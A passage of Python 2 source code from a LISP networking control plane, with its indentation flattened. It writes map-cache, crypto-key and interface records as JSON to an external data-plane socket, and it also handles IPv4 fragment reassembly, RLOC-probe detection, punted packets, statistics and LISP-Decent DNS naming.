# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
    # Write record in JSON format. Store the decryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
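#
# Example (illustrative): lisp_build_json_keys({}, "<ekey>", "<ikey>",
# "encrypt-key") returns:
#
#   { "keys" : [ { "key-id" : "1", "encrypt-key" : "<ekey>",
#                  "icv-key" : "<ikey>" } ] }
#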
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write the database-mappings to the ipc-data-plane
# socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-itr process, write the interface records to the ipc-data-plane
# socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
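#
# Examples (illustrative):
#
#   lisp_parse_auth_key("my-password")    returns {0 : "my-password"}
#   lisp_parse_auth_key("[3]my-password") returns {3 : "my-password"}
#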
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
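    #
    # Note on the fragment-offset field: 0x4000 is the DF bit, 0x2000 is the
    # MF bit, and the low 13 bits are the offset in 8-byte units. So fo of 0
    # (unfragmented) or 0x4000 (DF set) means nothing to reassemble, and
    # fo == 0x2000 below identifies the first fragment of a chain.
    #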
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue fragment if first fragment arrived and we determined its
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr>:0 in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
# is an xTR in public space. We'll have to change this in the future
        # so we don't do a full table traversal. But this only happens rarely.
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return the source address, source port, and TTL, and position the
# packet at the beginning of the LISP header. The packet pointer entering
# this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
    # Process stats counters in the lisp-etr and lisp-rtr processes. Variable
    # 'msg' is a dictionary array when the ITR/RTR is processing it. When an
    # ETR is processing it, 'msg' is the JSON string received from the ITR,
    # so it needs to be converted to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The JSON messages have
# types "discovery", "restart", "statistics", and "decap-statistics". This
# function dispatches to other functions for the stats and restart types,
# and itself processes the logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
                if (interface != None and lisp_i_am_itr):
                    lisp_itr_discover_eid(db, seid, device, interface,
                        punt_socket)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    #endfor
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
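#
# Example (hypothetical): with lisp_decent_modulus = 8, every EID-prefix
# hashes to an index 0..7, so lisp_get_decent_dns_name() below returns names
# like "5.decent.example.com" when the configured DNS suffix is
# "decent.example.com".
#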
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
